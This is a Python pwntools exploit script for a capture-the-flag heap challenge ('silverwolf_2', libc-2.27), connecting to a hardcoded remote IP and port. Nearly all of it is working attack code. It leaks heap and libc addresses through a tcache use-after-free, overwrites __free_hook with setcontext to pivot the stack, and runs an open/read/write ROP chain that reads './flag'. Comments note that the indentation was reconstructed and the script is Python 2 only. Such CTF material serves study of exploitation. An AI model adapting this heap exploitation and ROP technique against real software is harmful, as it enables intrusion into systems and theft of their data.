from
pwn
import
*
from
LibcSearcher
import
*
# Thin aliases around the global tube `io`, which is only assigned inside exp().
# Every alias resolves `io` at call time, so they may be defined before connecting.


def s(buf):
    """Send `buf` on the global tube."""
    return io.send(buf)


def sl(buf):
    """Send `buf` followed by a newline."""
    return io.sendline(buf)


def sa(delim, buf):
    """Wait for `delim`, then send `buf` (no trailing newline)."""
    return io.sendafter(delim, buf)


def sal(delim, buf):
    """Wait for `delim`, then send `buf` plus a newline."""
    return io.sendlineafter(delim, buf)


def shell():
    """Hand the tube over to the terminal."""
    return io.interactive()


def r(n=None):
    """Receive up to `n` bytes (pwntools default when `n` is None)."""
    return io.recv(n)


def ra(t=tube.forever):
    """Receive everything until EOF; `t` is the timeout, default `tube.forever`."""
    return io.recvall(t)


def ru(delim):
    """Receive until `delim` is seen (inclusive)."""
    return io.recvuntil(delim)


def rl():
    """Receive a single line."""
    return io.recvline()


def rls(n=2 ** 20):
    """Receive up to `n` lines (default 2**20)."""
    return io.recvlines(n)
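# Target binary and the libc it was shipped with; both are loaded at import time.
libc_path = "./libc-2.27.so"
elf_path = "./silverwolf_2"
libc = ELF(libc_path)
elf = ELF(elf_path)

# Verbosity is selected by argv[1]: '1' -> debug, '0' -> info. Any other value
# leaves `context` untouched, exactly like the original if/elif chain. A missing
# argument used to crash with IndexError; it now behaves like '0', which is the
# only mode that also sets arch='amd64' (needed for flat() to emit 8-byte words).
_LOG_LEVELS = {'1': 'debug', '0': 'info'}
_mode = sys.argv[1] if len(sys.argv) > 1 else '0'
_log_level = _LOG_LEVELS.get(_mode)
if _log_level is not None:
    context(log_level=_log_level, terminal='/bin/zsh', arch='amd64', os='linux')

# Menu prompt strings of the target, used as sendafter()/sendlineafter() delimiters.
cho = 'Your choice: '
siz = 'Size: '
con = 'Content: '
ind = 'Index: '
edi = ''  # unused in this file; kept for callers that may reference it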
def add(index='', size='', c='1'):
    """Drive the target's "add" menu entry.

    Sends the menu choice `c` at the `cho` prompt, then `index` and `size`
    (stringified) at the `ind` and `siz` prompts, each followed by a newline.
    """
    steps = (
        (cho, c),
        (ind, str(index)),
        (siz, str(size)),
    )
    for prompt, value in steps:
        sal(prompt, value)
def free(index, c='4'):
    """Drive the target's "free" menu entry for chunk `index`.

    `c` is the menu choice sent at the `cho` prompt; the index follows at the
    `ind` prompt.
    """
    sal(cho, c)
    index_text = str(index)
    sal(ind, index_text)
def show(index, c='3'):
    """Drive the target's "show" menu entry for chunk `index`.

    Only sends the requests; reading the printed contents is left to the caller.
    """
    for prompt, value in ((cho, c), (ind, str(index))):
        sal(prompt, value)
def edit(index, content='', c='2'):
    """Drive the target's "edit" menu entry for chunk `index`.

    `content` is sent with sa() — i.e. without an appended newline — so callers
    that need one must include it themselves.
    """
    sal(cho, c)
    index_text = str(index)
    sal(ind, index_text)
    sa(con, content)
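def get_proc_base(p):
    """Log and return the load base of the target binary inside process `p`.

    The lookup key for p.libs() is rebuilt from the process cwd plus argv[0]
    with its leading '.' removed (assumes p.libs() is keyed by absolute path —
    verify against the pwntools version in use). Note that strip('.') also
    removes trailing dots, so a binary name ending in '.' would not match.
    Relies on the private attribute p._cwd.

    Previously the value was only logged; it is now also returned so callers
    can use it without re-deriving the key.
    """
    key = p._cwd + p.argv[0].strip('.')
    proc_base = p.libs()[key]  # KeyError if the binary is not in the map
    info(hex(proc_base))
    return proc_base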
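def get_libc_base(p):
    """Log and return the load base of `libc_path` inside process `p`.

    Looks up the module-level `libc_path` string directly in p.libs(); the key
    must match exactly, so this only works when the process was started with
    that same relative path. Previously the value was only logged; it is now
    also returned. Raises KeyError if the library is not mapped.
    """
    libc_base = p.libs()[libc_path]
    info(hex(libc_base))
    return libc_base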
def clean():
    """Issue a fixed series of add() calls (all on index 0) before exp() proceeds.

    Sizes 0x18, 0x58 and 0x68 are requested; nothing is freed here.
    NOTE(review): the paste this was recovered from lost its indentation. The
    single add(0, 0x58) is placed between the two loops below, but it may
    originally have been the second statement of the first loop — confirm
    against the original file.
    """
    for i in range(14):
        add(0, 0x18)
    add(0, 0x58)
    for i in range(12):
        add(0, 0x68)
def exp():
    """Run the scripted interaction against the hardcoded remote target.

    Assigns the global `io` (the tube every helper alias uses), then drives the
    menu, parses two values the target prints back, and sends a sequence of
    payloads built from those values plus constant offsets. All constants
    (0x1170, 0xef8, 0xe18, 0xe80, 0xf30, 0x200 and the libc gadget offsets) are
    specific to this binary and this libc-2.27 build and will not transfer to
    another build.

    NOTE(review): host and port are hardcoded; they should come from argv or an
    environment variable so the script can be pointed at a local instance.
    NOTE(review): str literals ('\\n', '\\x00', './flag\\x00') are concatenated
    with p64()/flat() output, which only type-checks under Python 2 — confirm
    the interpreter before relying on this file.
    NOTE(review): indentation was lost in the source paste; the loop body
    below (free + edit) was reconstructed and should be confirmed.
    """
    global io
    io = remote('124.70.110.211', 23535)
    clean()
    add(0, 0x78)
    free(0)
    show(0)
    r(9)
    # First value read back: 6 bytes after a 9-byte prefix, zero-padded to 8.
    raw = u64(r(6).ljust(8, '\x00'))
    info("raw:" + hex(raw))
    heap = raw - 0x1170  # 0x1170 is a layout-specific delta — TODO confirm
    success("heap: " + hex(heap))
    edit(0, p64(heap + 0x10) + p64(0) + '\n')
    add(0, 0x78)
    add(0, 0x78)
    edit(0, '\x00' * 0x78)  # no trailing '\n': exactly 0x78 bytes are sent
    for i in range(7):
        free(0)
        edit(0, p64(0) * 2 + '\n')
    free(0)
    show(0)
    r(9)
    # Second value read back: everything up to and including the first 0x7f
    # byte. The 96 and 0x10 adjustments are tied to this libc's data layout.
    libc.address = u64(ru('\x7f').ljust(8, '\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
    success("libc: " + hex(libc.address))
    setcontext = libc.sym['setcontext'] + 53
    free_hook = libc.sym['__free_hook']
    success("free_hook:" + hex(free_hook))
    success("setcontext:" + hex(setcontext))
    edit(0, p64(0x1) * 8 + p64(0) * 3 + p64(heap + 0xef8) + p64(free_hook) + p64(heap + 0xe18) + p64(heap + 0xe80) + '\n')
    success("orw:" + hex(heap + 0xe18))
    add(0, 0x58)
    edit(0, p64(setcontext) + '\n')
    add(0, 0x48)
    flag_addr = heap + 0xf30
    rsp = heap + 0xe18
    rbx = 0
    rbp = 0
    r12 = 0
    r13 = 0
    r14 = 0
    # Gadget offsets below are for this exact libc-2.27 build only.
    pop_rdi = libc.address + 0x00000000000215bf
    stack_pivot = flat(rbx, rbp, r12, r13, r14, rsp + 8, pop_rdi, './flag\x00')
    info("stack_pivot len:" + hex(len(stack_pivot)))
    edit(0, stack_pivot + '\n')
    add(0, 0x68)
    flag_str_addr = heap + 0xf30
    pop_rdi = libc.address + 0x00000000000215bf  # same value as above, recomputed
    pop_rsi = libc.address + 0x0000000000023eea
    syscall = 0xD2745 + libc.address
    pop_rax = libc.address + 0x0000000000043ae8
    pop_rdx_r10 = 0x0000000000130544 + libc.address
    # flag_addr is rebound here; the earlier heap + 0xf30 value lives on only
    # as flag_str_addr.
    flag_addr = heap + 0x200
    info(hex(pop_rdi) + ' ' + hex(pop_rsi))
    orw1 = flat(pop_rdi, flag_str_addr, pop_rsi, 0, pop_rax, 2, syscall, pop_rdi, 3, pop_rsi, flag_addr, pop_rdx_r10, 0x100, )
    edit(0, orw1 + '\n')
    add(0, 0x78)
    orw2 = flat(0, pop_rax, 0, syscall, pop_rdi, 1, pop_rsi, flag_addr, pop_rdx_r10, 0x100, 0, pop_rax, 1, syscall)
    edit(0, orw2 + '\n')
    shell()
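# Run only when executed as a script; importing the module for its helpers
# (e.g. the menu wrappers) no longer opens a connection as a side effect.
if __name__ == '__main__':
    exp()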